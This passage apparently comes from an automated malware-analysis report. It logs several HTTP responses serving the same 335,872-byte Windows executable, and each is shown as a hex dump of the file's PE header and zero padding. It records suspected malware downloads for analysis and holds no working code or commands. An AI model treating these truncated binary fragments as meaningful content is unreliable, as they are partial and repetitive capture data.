00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:54 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:54 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:54 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:55 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:55 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:56 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:02:04 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 